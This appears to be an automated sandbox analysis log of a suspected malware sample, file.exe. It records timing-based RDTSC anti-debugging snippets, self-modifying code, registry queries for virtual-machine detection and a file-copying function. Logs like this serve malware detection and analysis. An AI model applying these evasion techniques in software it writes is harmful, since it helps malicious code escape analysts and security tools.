              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A30E3 second address: 8A3134 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FEF0C6C7666h 0x0000000e jmp 00007FEF0C6C7669h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEF0C6C7667h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3470 second address: 8A3482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007FEF0C74E726h 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8EA6 second address: 8A8EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACCAD second address: 8ACCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACCB1 second address: 8ACCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C7661h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FEF0C6C7656h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEEE second address: 7FFEF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEF3 second address: 7FFEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEF9 second address: 7FFF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007FEF0C74E731h 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF6F second address: 8ABF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF75 second address: 8ABF8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E72Fh 0x00000007 jno 00007FEF0C74E726h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF8E second address: 8ABF9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF9E second address: 8ABFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABFA2 second address: 8ABFCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEF0C6C7668h 0x00000011 jg 00007FEF0C6C7666h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABFCE second address: 8ABFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E72Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC3E3 second address: 8AC3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C765Ch 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC529 second address: 8AC554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E734h 0x00000007 jmp 00007FEF0C74E733h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC554 second address: 8AC55E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C6C765Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC6CD second address: 8AC6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC83F second address: 8AC845 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC845 second address: 8AC84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B29CA second address: 8B29E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FEF0C6C7662h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B3436 second address: 8B343B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43B1 second address: 8B43C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEF0C6C765Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B43C2 second address: 8B43CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEF0C74E726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD290 second address: 8BD2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2A5 second address: 8BD2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2AB second address: 8BD2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2AF second address: 8BD2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007FEF0C74E728h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEF0C74E731h 0x00000018 jno 00007FEF0C74E726h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCCAE second address: 8BCCC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FEF0C6C765Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCCC4 second address: 8BCCDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEF0C74E732h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCE84 second address: 8CCE8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CCE8A second address: 8CCE94 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEF0C74E72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E64 second address: 8D2E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E6A second address: 8D2E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E730h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E7E second address: 8D2E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2E82 second address: 8D2E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA00D second address: 8DA013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA013 second address: 8DA01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA01B second address: 8DA021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806CF3 second address: 806D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007FEF0C74E72Ah 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E380A second address: 8E380E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E380E second address: 8E382D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEF0C74E726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEF0C74E72Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E382D second address: 8E3841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C7660h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3841 second address: 8E385E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E385E second address: 8E3878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FEF0C6C7656h 0x0000000b jmp 00007FEF0C6C765Bh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3878 second address: 8E387E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E218C second address: 8E2194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E22E3 second address: 8E2313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E730h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FEF0C74E733h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2313 second address: 8E231C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E231C second address: 8E2322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2322 second address: 8E2326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E270A second address: 8E270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2AE5 second address: 8E2AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E4E49 second address: 8E4E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E737h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FEF0C74E735h 0x00000015 pop ecx 0x00000016 jmp 00007FEF0C74E72Ch 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E9209 second address: 8E920D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E920D second address: 8E923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007FEF0C74E733h 0x0000000f push edi 0x00000010 jmp 00007FEF0C74E72Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E923C second address: 8E9249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FEF0C6C7674h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E93B0 second address: 8E93B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E93B6 second address: 8E93DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FEF0C6C7656h 0x00000010 jmp 00007FEF0C6C7668h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F64E4 second address: 8F64E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F64E8 second address: 8F64EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808834 second address: 80886F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FEF0C74E738h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEF0C74E736h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80886F second address: 80887E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C765Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80887E second address: 808884 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906B5D second address: 906B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906B62 second address: 906B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007FEF0C74E726h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906B71 second address: 906B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9089D0 second address: 9089ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEF0C74E732h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F493 second address: 91F497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9231D5 second address: 9231EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEF0C74E726h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9231EA second address: 9231EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9231EE second address: 9231FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C74E726h 0x00000008 je 00007FEF0C74E726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925A98 second address: 925AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEF0C6C7656h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925F5F second address: 925FBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007FEF0C74E726h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D33F4h], edi 0x00000013 push dword ptr [ebp+122D1A42h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FEF0C74E728h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov edx, ecx 0x00000035 mov dx, 5700h 0x00000039 call 00007FEF0C74E729h 0x0000003e pushad 0x0000003f jng 00007FEF0C74E728h 0x00000045 pushad 0x00000046 popad 0x00000047 push ebx 0x00000048 push esi 0x00000049 pop esi 0x0000004a pop ebx 0x0000004b popad 0x0000004c push eax 0x0000004d push ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pop eax 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9271F3 second address: 927226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7666h 0x00000007 jmp 00007FEF0C6C7669h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A9EC second address: 92A9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB022E second address: 4FB0287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FEF0C6C7664h 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007FEF0C6C7663h 0x0000001c movzx ecx, dx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FEF0C6C765Ch 0x00000029 mov eax, 5526E961h 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0300 second address: 4FB033A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEF0C74E731h 0x00000009 adc ecx, 51452206h 0x0000000f jmp 00007FEF0C74E731h 0x00000014 popfd 0x00000015 mov ecx, 197629B7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB033A second address: 4FB0364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 mov eax, 2D2EEEA7h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, 5FACC2BBh 0x00000018 call 00007FEF0C6C7660h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0364 second address: 4FB03A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEF0C74E730h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov cl, E0h 0x00000014 mov ecx, edx 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FEF0C74E730h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB03A4 second address: 4FB03AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB03AA second address: 4FB03AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845DD3 second address: 845DD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845FB8 second address: 845FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 67FB89 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 67FC81 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8C1EB0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-27136
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-25954
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_004418A0
